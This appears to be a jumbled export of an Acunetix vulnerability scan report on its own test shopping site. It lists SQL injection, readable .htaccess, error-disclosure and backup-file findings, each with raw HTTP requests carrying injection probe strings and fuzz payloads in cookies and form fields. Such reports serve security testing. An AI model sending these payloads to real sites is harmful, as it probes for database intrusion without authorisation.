HighSeverity

ValidationType

Scripting (Sql_Injection.script)Reported by module

Description


Impact


Recommendation


References

OWASP PHP Top 5






Affected items

/

Details

Cookie input login was set to 1'"Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in/hj/var/www/index.php on line 47

GET / HTTP/1.1

Cookie: login=1'"; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers








/cart.php

Details

URL encoded POST input addcart was set to 1'"Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in/hj/var/www/cart.php on line 82

POST /cart.php?del=2 HTTP/1.1

Content-Length: 11











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

addcart=1'"

Request headers

/cart.php

Details

URL encoded POST input addcart was set to 1'"Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in/hj/var/www/cart.php on line 82

POST /cart.php HTTP/1.1

Content-Length: 21











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

addcart=1'"&price=800

Request headers

/cart.php

Details

Cookie input login was set to 1'"Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in/hj/var/www/cart.php on line 45

GET /cart.php HTTP/1.1

Cookie: login=1'"; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


SQL injection (verified)

HighSeverity

ValidationType

Scripting (Sql_Injection.script)Reported by module

Description


Impact


Recommendation


References






OWASP PHP Top 5

Affected items


Details

URL encoded GET input id was set to 1ACUSTART'"rw4cwACUENDAdditional details: Source file: /hj/var/www//AJAX/infoartist.php line: 5 SQL query: SELECT * FROM artists WHERE artist_id=1ACUSTART'"rw4cwACUEND "mysql_query" was called.

GET /AJAX/infoartist.php?id=1ACUSTART'"rw4cwACUEND HTTP/1.1











Request headers









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

/AJAX/infocateg.php

Details

URL encoded GET input id was set to 1ACUSTART'"9xkTnACUENDAdditional details: Source file: /hj/var/www//AJAX/infocateg.php line: 5 SQL query: SELECT * FROM categ WHERE cat_id=1ACUSTART'"9xkTnACUEND "mysql_query" was called.

GET /AJAX/infocateg.php?id=1ACUSTART'"9xkTnACUEND HTTP/1.1












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/AJAX/infotitle.php

Details

URL encoded POST input id was set to 1ACUSTART'"BYMmLACUENDAdditional details: Source file: /hj/var/www//AJAX/infotitle.php line: 5 SQL query: SELECT * FROM pictures WHERE pic_id=1ACUSTART'"BYMmLACUEND "mysql_query" was called.




Content-Length: 25











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

id=1ACUSTART'"BYMmLACUEND

Request headers

/artists.php

Details

URL encoded GET input artist was set to 1ACUSTART'"5qFwLACUENDAdditional details: Source file: /hj/var/www//artists.php line: 61 SQL query: SELECT * FROM artists WHERE artist_id=1ACUSTART'"5qFwLACUEND "mysql_query" was called.

Request headers


GET /artists.php?artist=1ACUSTART'"5qFwLACUEND HTTP/1.1












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

/artists.php

Details

Cookie input login was set to 1ACUSTART'"z62ZAACUENDAdditional details: Source file: /hj/var/www//artists.php line: 44 SQL query: SELECT * FROM users WHERE uname='1ACUSTART'"z62ZAACUEND' AND pass='' "mysql_query" wascalled.

GET /artists.php HTTP/1.1



Cookie: login=1ACUSTART'"z62ZAACUEND; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/guestbook.php

Details

Cookie input login was set to 1ACUSTART'"fdWcMACUENDAdditional details: Source file: /hj/var/www//guestbook.php line: 49 SQL query: SELECT * FROM users WHERE uname='1ACUSTART'"fdWcMACUEND' AND pass='' "mysql_query" wascalled.

GET /guestbook.php HTTP/1.1



Cookie: login=1ACUSTART'"fdWcMACUEND; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


/listproducts.php

Details

URL encoded GET input artist was set to 1ACUSTART'"u7SnqACUENDAdditional details: Source file: /hj/var/www//listproducts.php line: 67 SQL query: SELECT a.*, b.aname, b.artist_id, c.cname FROM pictures a, artists b, categ c WHERE a.cat_id=c.cat_idAND a.a_id=b.artist_id AND a.a_id=1ACUSTART'"u7SnqACUEND "mysql_query" was called.

GET /listproducts.php?artist=1ACUSTART'"u7SnqACUEND HTTP/1.1












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/listproducts.php

Details

URL encoded GET input cat was set to 1ACUSTART'"2S1FHACUENDAdditional details: Source file: /hj/var/www//listproducts.php line: 61 SQL query: SELECT a.*, b.aname, b.artist_id, c.cname FROM pictures a, artists b, categ c WHERE a.cat_id=c.cat_idAND a.a_id=b.artist_id AND a.cat_id=1ACUSTART'"2S1FHACUEND "mysql_query" was called.

GET /listproducts.php?cat=1ACUSTART'"2S1FHACUEND HTTP/1.1












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/listproducts.php

Details

URL encoded GET input cat was set to 1ACUSTART'"jKbkhACUENDAdditional details: Source file: /hj/var/www//listproducts.php line: 61 SQL query: SELECT a.*, b.aname, b.artist_id, c.cname FROM pictures a, artists b, categ c WHERE a.cat_id=c.cat_idAND a.a_id=b.artist_id AND a.cat_id=1ACUSTART'"jKbkhACUEND "mysql_query" was called.

GET /listproducts.php?artist=1&cat=1ACUSTART'"jKbkhACUEND HTTP/1.1




Request headers










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

/listproducts.php

Details

Cookie input login was set to 1ACUSTART'"nEf4zACUENDAdditional details: Source file: /hj/var/www//listproducts.php line: 43 SQL query: SELECT * FROM users WHERE uname='1ACUSTART'"nEf4zACUEND' AND pass='' "mysql_query" wascalled.

GET /listproducts.php HTTP/1.1



Cookie: login=1ACUSTART'"nEf4zACUEND; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/Mod_Rewrite_Shop/buy.php

Details

URL encoded GET input id was set to 1ACUSTART'"12wlFACUENDAdditional details: Source file: /hj/var/www//Mod_Rewrite_Shop/buy.php line: 6 SQL query: SELECT * from products where id=1ACUSTART'"12wlFACUEND "mysql_query" was called. Stack trace: 1.ProcessID([string] "1ACUSTART'"12wlFACUEND")

GET /Mod_Rewrite_Shop/buy.php?id=1ACUSTART'"12wlFACUEND HTTP/1.1












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/Mod_Rewrite_Shop/details.php


Details

URL encoded GET input id was set to 1ACUSTART'"cXCwxACUENDAdditional details: Source file: /hj/var/www//Mod_Rewrite_Shop/details.php line: 4 SQL query: SELECT * from products where id=1ACUSTART'"cXCwxACUEND "mysql_query" was called.

GET /Mod_Rewrite_Shop/details.php?id=1ACUSTART'"cXCwxACUEND HTTP/1.1












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/Mod_Rewrite_Shop/rate.php

Details

URL encoded GET input id was set to 1ACUSTART'"g97N9ACUENDAdditional details: Source file: /hj/var/www//Mod_Rewrite_Shop/rate.php line: 6 SQL query: SELECT * from products where id=1ACUSTART'"g97N9ACUEND "mysql_query" was called. Stack trace: 1.ProcessID([string] "1ACUSTART'"g97N9ACUEND")

GET /Mod_Rewrite_Shop/rate.php?id=1ACUSTART'"g97N9ACUEND HTTP/1.1












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/product.php

Details

Cookie input login was set to 1ACUSTART'"ctNejACUENDAdditional details: Source file: /hj/var/www//product.php line: 51 SQL query: SELECT * FROM users WHERE uname='1ACUSTART'"ctNejACUEND' AND pass='' "mysql_query" wascalled.

GET /product.php HTTP/1.1



Cookie: login=1ACUSTART'"ctNejACUEND; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;




Request headers







Chrome/41.0.2228.0 Safari/537.21

Accept: */*

/product.php

Details

URL encoded GET input pic was set to 1ACUSTART'"JPtCvACUENDAdditional details: Source file: /hj/var/www//product.php line: 68 SQL query: SELECT a.*, b.aname, b.artist_id, c.cname FROM pictures a, artists b, categ c WHERE a.cat_id=c.cat_idAND a.a_id=b.artist_id AND a.pic_id=1ACUSTART'"JPtCvACUEND "mysql_query" was called.

GET /product.php?pic=1ACUSTART'"JPtCvACUEND HTTP/1.1












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/search.php

Details

Cookie input login was set to 1ACUSTART'"WxYBAACUENDAdditional details: Source file: /hj/var/www//search.php line: 44 SQL query: SELECT * FROM users WHERE uname='1ACUSTART'"WxYBAACUEND' AND pass='' "mysql_query" wascalled.

GET /search.php HTTP/1.1



Cookie: login=1ACUSTART'"WxYBAACUEND; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/search.php


Details

URL encoded POST input searchFor was set to 1ACUSTART'"loYAnACUENDAdditional details: Source file: /hj/var/www//search.php line: 70 SQL query: SELECT a.*, b.aname, b.artist_id, c.cname FROM pictures a, artists b, categ c WHERE a.cat_id=c.cat_idAND a.a_id=b.artist_id AND (LOCATE('1ACUSTART'"loYAnACUEND', a.title) > 0 ORLOCATE('1ACUSTART'"loYAnACUEND', a.pshort) > 0) "mysql_query" was called.




Content-Length: 32











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

searchFor=1ACUSTART'"loYAnACUEND

Request headers

/search.php

Details

URL encoded POST input searchFor was set to 1ACUSTART'"utFXSACUENDAdditional details: Source file: /hj/var/www//search.php line: 70 SQL query: SELECT a.*, b.aname, b.artist_id, c.cname FROM pictures a, artists b, categ c WHERE a.cat_id=c.cat_idAND a.a_id=b.artist_id AND (LOCATE('1ACUSTART'"utFXSACUEND', a.title) > 0 ORLOCATE('1ACUSTART'"utFXSACUEND', a.pshort) > 0) "mysql_query" was called.




Content-Length: 44











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

goButton=go&searchFor=1ACUSTART'"utFXSACUEND

Request headers

/search.php


Details

URL encoded GET input test was set to 1ACUSTART'"TP76JACUENDAdditional details: Source file: /hj/var/www//search.php line: 60 SQL query: SELECT * FROM guestbook WHERE sender='1ACUSTART'"TP76JACUEND'; "mysql_query" was called.

POST /search.php?test=1ACUSTART'"TP76JACUEND HTTP/1.1



Content-Length: 11











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

searchFor=1

Request headers

/search.php

Details

URL encoded GET input test was set to 1ACUSTART'"mb71xACUENDAdditional details: Source file: /hj/var/www//search.php line: 60 SQL query: SELECT * FROM guestbook WHERE sender='1ACUSTART'"mb71xACUEND'; "mysql_query" was called.

POST /search.php?test=1ACUSTART'"mb71xACUEND HTTP/1.1



Content-Length: 22











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

goButton=go&searchFor=

Request headers


Details

URL encoded POST input uuname was set to 1ACUSTART'"ZyCc4ACUENDAdditional details: Source file: /hj/var/www//secured/newuser.php line: 16 SQL query: SELECT * FROM users WHERE uname='1ACUSTART'"ZyCc4ACUEND' "mysql_query" was called.


Request headers




Content-Length: 205











Chrome/41.0.2228.0 Safari/537.21

Accept: */*


.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=rbyjoahd&

uuname=1ACUSTART'"ZyCc4ACUEND

/sendcommand.php

Details

URL encoded POST input cart_id was set to 1ACUSTART'"bAxWhACUENDAdditional details: Source file: /hj/var/www//sendcommand.php line: 17 SQL query: DELETE FROM carts WHERE cart_id='1ACUSTART'"bAxWhACUEND' "mysql_query" was called.




Content-Length: 83











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

submitForm=place%20a%20command%20for%20these%20items&cart_id=1ACUSTART'"bAxWhACUEND

Request headers

/sendcommand.php

Details

URL encoded POST input cart_id was set to 1ACUSTART'"yJrZSACUENDAdditional details: Source file: /hj/var/www//sendcommand.php line: 17 SQL query: DELETE FROM carts WHERE cart_id='1ACUSTART'"yJrZSACUEND' "mysql_query" was called.




Content-Length: 30





Request headers








Chrome/41.0.2228.0 Safari/537.21

Accept: */*

cart_id=1ACUSTART'"yJrZSACUEND

/userinfo.php

Details

Cookie input login was set to 1ACUSTART'"C0V02ACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 46 SQL query: SELECT * FROM users WHERE uname='1ACUSTART'"C0V02ACUEND' AND pass='' "mysql_query" wascalled.

GET /userinfo.php HTTP/1.1



Cookie: login=1ACUSTART'"C0V02ACUEND; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/userinfo.php

Details

URL encoded POST input pass was set to 1ACUSTART'"yJk7ZACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 8 SQL query: SELECT * FROM users WHERE uname='test' AND pass='1ACUSTART'"yJk7ZACUEND' "mysql_query"was called.




Content-Length: 38







Chrome/41.0.2228.0 Safari/537.21

Accept: */*

pass=1ACUSTART'"yJk7ZACUEND&uname=test

Request headers

/userinfo.php


Details

URL encoded POST input uaddress was set to 1ACUSTART'"Ov4arACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = 'test', cc = '1234-5678-2300-9000', address = '1ACUSTART'"Ov4arACUEND',email = '[email protected]', phone = 'test' WHERE uname = 'test' "mysql_query" was called.




Content-Length: 124











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

uaddress=1ACUSTART'"Ov4arACUEND&ucc=1234-5678-2300-9000&[email protected]&uname=1&u

pdate=update&uphone=test&urname=test

Request headers

/userinfo.php

Details

URL encoded POST input uaddress was set to 1ACUSTART'"0glYGACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = 'test', cc = '1234-5678-2300-9000', address = '1ACUSTART'"0glYGACUEND',email = '[email protected]', phone = 'test' WHERE uname = 'test' "mysql_query" was called.




Content-Length: 118











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

update=update&uaddress=1ACUSTART'"0glYGACUEND&ucc=1234-5678-2300-9000&uemail=ccccc%40gma

il.com&uphone=test&urname=test

Request headers

/userinfo.php


Details

URL encoded POST input ucc was set to 1ACUSTART'"6qlErACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = 'test', cc = '1ACUSTART'"6qlErACUEND', address = 'SELECT * FROMINFORMATION_SCHEMA.TABLES', email = '[email protected]', phone = 'test' WHERE uname = 'test' "mysql_query"was called.




Content-Length: 150











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

update=update&uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES&ucc=1ACUSTART

'"6qlErACUEND&uemail=ccccc%40gmail.com&uphone=test&urname=test

Request headers

/userinfo.php

Details

URL encoded POST input ucc was set to 1ACUSTART'"WAt5JACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = 'test', cc = '1ACUSTART'"WAt5JACUEND', address = 'SELECT * FROMINFORMATION_SCHEMA.TABLES', email = '[email protected]', phone = 'test' WHERE uname = 'test' "mysql_query"was called.




Content-Length: 146











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

uaddress=SELECT *

FROM

INFORMATION_SCHEMA.TABLES&ucc=1ACUSTART'"WAt5JACUEND&[email protected]&uname=1&upda

te=update&uphone=test&urname=test

Request headers

/userinfo.php


Details

URL encoded POST input uemail was set to 1ACUSTART'"2u9BSACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = 'test', cc = '1234-5678-2300-9000', address = 'SELECT * FROMINFORMATION_SCHEMA.TABLES', email = '1ACUSTART'"2u9BSACUEND', phone = 'test' WHERE uname = 'test'"mysql_query" was called.




Content-Length: 152











Chrome/41.0.2228.0 Safari/537.21

Accept: */*


-2300-9000&uemail=1ACUSTART'"2u9BSACUEND&uphone=test&urname=test

Request headers

/userinfo.php

Details

URL encoded POST input uemail was set to 1ACUSTART'"JL6otACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = 'test', cc = '1234-5678-2300-9000', address = 'SELECT * FROMINFORMATION_SCHEMA.TABLES', email = '1ACUSTART'"JL6otACUEND', phone = 'test' WHERE uname = 'test'"mysql_query" was called.




Content-Length: 150











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

uaddress=SELECT *

FROM

INFORMATION_SCHEMA.TABLES&ucc=1234-5678-2300-9000&uemail=1ACUSTART'"JL6otACUEND&uname=1&

update=update&uphone=test&urname=test

Request headers

/userinfo.php


Details

URL encoded POST input uname was set to 1ACUSTART'"tYz3WACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 8 SQL query: SELECT * FROM users WHERE uname='1ACUSTART'"tYz3WACUEND' AND pass='test' "mysql_query"was called.




Content-Length: 38







Chrome/41.0.2228.0 Safari/537.21

Accept: */*

pass=test&uname=1ACUSTART'"tYz3WACUEND

Request headers

/userinfo.php

Details

URL encoded POST input uphone was set to 1ACUSTART'"iR0eRACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = 'test', cc = '1234-5678-2300-9000', address = 'SELECT * FROMINFORMATION_SCHEMA.TABLES', email = '[email protected]', phone = '1ACUSTART'"iR0eRACUEND' WHEREuname = 'test' "mysql_query" was called.




Content-Length: 165











Chrome/41.0.2228.0 Safari/537.21

Accept: */*


-2300-9000&uemail=ccccc%40gmail.com&uphone=1ACUSTART'"iR0eRACUEND&urname=test

Request headers

/userinfo.php

Details

URL encoded POST input uphone was set to 1ACUSTART'"6XnwLACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = 'test', cc = '1234-5678-2300-9000', address = 'SELECT * FROMINFORMATION_SCHEMA.TABLES', email = '[email protected]', phone = '1ACUSTART'"6XnwLACUEND' WHEREuname = 'test' "mysql_query" was called.





Content-Length: 161











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

uaddress=SELECT *

FROM


update&uphone=1ACUSTART'"6XnwLACUEND&urname=test

Request headers

/userinfo.php

Details

URL encoded POST input urname was set to 1ACUSTART'"FubzyACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = '1ACUSTART'"FubzyACUEND', cc = '1234-5678-2300-9000', address ='SELECT * FROM INFORMATION_SCHEMA.TABLES', email = '[email protected]', phone = 'test' WHERE uname ='test' "mysql_query" was called.




Content-Length: 161











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

uaddress=SELECT *

FROM


update&uphone=test&urname=1ACUSTART'"FubzyACUEND

Request headers

/userinfo.php


Details

URL encoded POST input urname was set to 1ACUSTART'"jKjkUACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = '1ACUSTART'"jKjkUACUEND', cc = '1234-5678-2300-9000', address ='SELECT * FROM INFORMATION_SCHEMA.TABLES', email = '[email protected]', phone = 'test' WHERE uname ='test' "mysql_query" was called.




Content-Length: 165











Chrome/41.0.2228.0 Safari/537.21

Accept: */*


-2300-9000&uemail=ccccc%40gmail.com&uphone=test&urname=1ACUSTART'"jKjkUACUEND

Request headers


.htaccess file readable

MediumSeverity

ValidationType

Scripting (htaccess_File_Readable.script)Reported by module

Description

This directory contains an .htaccess file that is readable. This may indicate a server misconfiguration. htaccess files aredesigned to be parsed by web server and should not be directly accessible. These files could contain sensitiveinformation that could help an attacker to conduct further attacks. It's recommended to restrict access to this file.

Impact

Possible sensitive information disclosure.

Recommendation

Restrict access to the .htaccess file by adjusting the web server configuration.

Affected items

/Mod_Rewrite_Shop

Details

No details are available.

GET /Mod_Rewrite_Shop/.htaccess HTTP/1.1









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


Application error message

MediumSeverity

ValidationType

Scripting (Error_Message.script)Reported by module

Description

This page contains an error/warning message that may disclose sensitive information. The message can also contain thelocation of the file that produced the unhandled exception. This may be a false positive if the error message is found in documentation pages.

Impact

The error messages may disclose sensitive information. This information can be used to launch further attacks.

Recommendation

Review the source code for this script.

References

PHP Runtime Configuration

Affected items

/listproducts.php

Details

URL encoded GET input artist was set to Error message found: You have an error in your SQL syntax

GET /listproducts.php?artist= HTTP/1.1










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/listproducts.php

Details

URL encoded GET input cat was set to Error message found: You have an error in your SQL syntax

GET /listproducts.php?artist=1&cat= HTTP/1.1










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/listproducts.php


http://www.php.net/manual/en/errorfunc.configuration.php#ini.display-errors

Details

URL encoded GET input cat was set to Error message found: You have an error in your SQL syntax

GET /listproducts.php?cat= HTTP/1.1










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


Details

URL encoded POST input uuname was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax


Content-Length: 225











Chrome/41.0.2228.0 Safari/537.21

Accept: */*


.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=ahopldfw&

uuname=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'####

Request headers

/showimage.php

Details

URL encoded GET input file was set to Error message found: Warning: fopen(): Unable to access .tn in /hj/var/www/showimage.php on line 19 Warning: fopen(.tn): failed to open stream: No such file or directory in /hj/var/www/showimage.php on line 19

GET /showimage.php?file=&size=160 HTTP/1.1










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/showimage.php


Details

URL encoded GET input file was set to acu8748%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca8748Error message found: Warning: fopen(): Unable to access acu8748###s1###s2##s3##uca8748 in/hj/var/www/showimage.php on line 7 Warning: fopen(acu8748###s1###s2##s3##uca8748): failed to open stream: No such file or directory in/hj/var/www/showimage.php on line 7

GET /showimage.php?file=acu8748%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca8748 HTTP/1.1










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/userinfo.php

Details

URL encoded POST input uaddress was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax


Content-Length: 138











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

update=update&uaddress=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'####&ucc=1234-5678-2300-900

0&uemail=ccccc%40gmail.com&uphone=test&urname=test

Request headers

/userinfo.php

Details

URL encoded POST input uaddress was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax


Content-Length: 144











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

uaddress=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'####&ucc=1234-5678-2300-9000&uemail=cccc

Request headers


[email protected]&uname=1&update=update&uphone=test&urname=test

/userinfo.php

Details

URL encoded POST input ucc was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax


Content-Length: 170











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

update=update&uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES&ucc=12345'"\'

\");|]*%00{%0d%0a<%00>%bf%27'####&uemail=ccccc%40gmail.com&uphone=test&urname=test

Request headers

/userinfo.php

Details

URL encoded POST input ucc was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax


Content-Length: 166











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

uaddress=SELECT *

FROM

INFORMATION_SCHEMA.TABLES&ucc=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'####&uemail=ccccc@gm

ail.com&uname=1&update=update&uphone=test&urname=test

Request headers

/userinfo.php

Details

URL encoded POST input uemail was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax


Content-Length: 170









Request headers




Chrome/41.0.2228.0 Safari/537.21

Accept: */*

uaddress=SELECT *

FROM

INFORMATION_SCHEMA.TABLES&ucc=1234-5678-2300-9000&uemail=12345'"\'\");|]*%00{%0d%0a<%00>

%bf%27'####&uname=1&update=update&uphone=test&urname=test

/userinfo.php

Details

URL encoded POST input uemail was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax


Content-Length: 172











Chrome/41.0.2228.0 Safari/537.21

Accept: */*


-2300-9000&uemail=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'####&uphone=test&urname=test

Request headers

/userinfo.php

Details

URL encoded POST input uphone was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax


Content-Length: 181











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

uaddress=SELECT *

FROM


update&uphone=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'####&urname=test

Request headers

/userinfo.php

Details

URL encoded POST input uphone was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax


Content-Length: 185

Request headers












Chrome/41.0.2228.0 Safari/537.21

Accept: */*


-2300-9000&uemail=ccccc%40gmail.com&uphone=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'####&ur

name=test

/userinfo.php

Details

URL encoded POST input urname was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax


Content-Length: 185











Chrome/41.0.2228.0 Safari/537.21

Accept: */*


-2300-9000&uemail=ccccc%40gmail.com&uphone=test&urname=12345'"\'\");|]*%00{%0d%0a<%00>%b

f%27'####

Request headers

/userinfo.php

Details

URL encoded POST input urname was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'#??#Error message found: You have an error in your SQL syntax


Content-Length: 181











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

uaddress=SELECT *

FROM


update&uphone=test&urname=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'####

Request headers


Backup files

MediumSeverity

ValidationType

Scripting (Backup_File.script)Reported by module

Description

A possible backup file was found on your web-server. These files are usually created by developers to backup their work.

Impact

Backup files can contain script sources, configuration files or other sensitive information that may help an malicious userto prepare more advanced attacks.

Recommendation

Remove the file(s) if they are not required on your website. As an additional step, it is recommended to implement asecurity policy within your organization to disallow creation of backup files in directories accessible from the web.

References

Testing for Old, Backup and Unreferenced Files (OWASP-CM-006)

Security Tips for Server Configuration

Protecting Confidential Documents at Your Site

Affected items

/index.bak

Details

This file was found using the pattern ${fileName}.bak.Original filename: index.phpSource code pattern found: <?PHP require_once("database_connect.php"); ?><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <title>Home of WASP Art</title><link rel="stylesheet" href="style.css" type="text/css"><script language="JavaScript" type="text/JavaScript"></script> </head><body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"><div id="masthead"> <h1 id="siteName">ACUNETIX ART</h1> <h6 id="siteInfo">TEST and Demonstration site for Acunetix Web Vulnerability Scanner</h6> <div id="globalNav">


https://www.owasp.org/index.php/Review_Old,_Backup_and_Unreferenced_Files_for_Sensitive_Information_(OTG-CONFIG-004)

http://httpd.apache.org/docs/1.3/misc/security_tips.html

http://www.w3.org/Security/Faq/wwwsf5.html

<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> </div> </div>  <div id="content"> <h2 id="pageName">welcome to our page</h2> <div class="story"> <h3>Test site for WASP.</h3> </div></div> <div id="navBar"> <div id="search"> <form action="search.php" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <?PHP if (isset($_COOKIE["login"]))echo '<li><a href="../logout.php">Logout</a>'; ?></li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p><img src="images/add.jpg" alt="" width="107" height="66"></p> </div> </div>  <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="redir.php?r=index.php">Site Map</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:[email protected]">Contact Us</a> |©2004 Acunetix Ltd </div> <br> </div></body></html>

GET /index.bak HTTP/1.1

Range: bytes=0-99999






Request headers

Chrome/41.0.2228.0 Safari/537.21

Accept: */*

/index.zip

Details

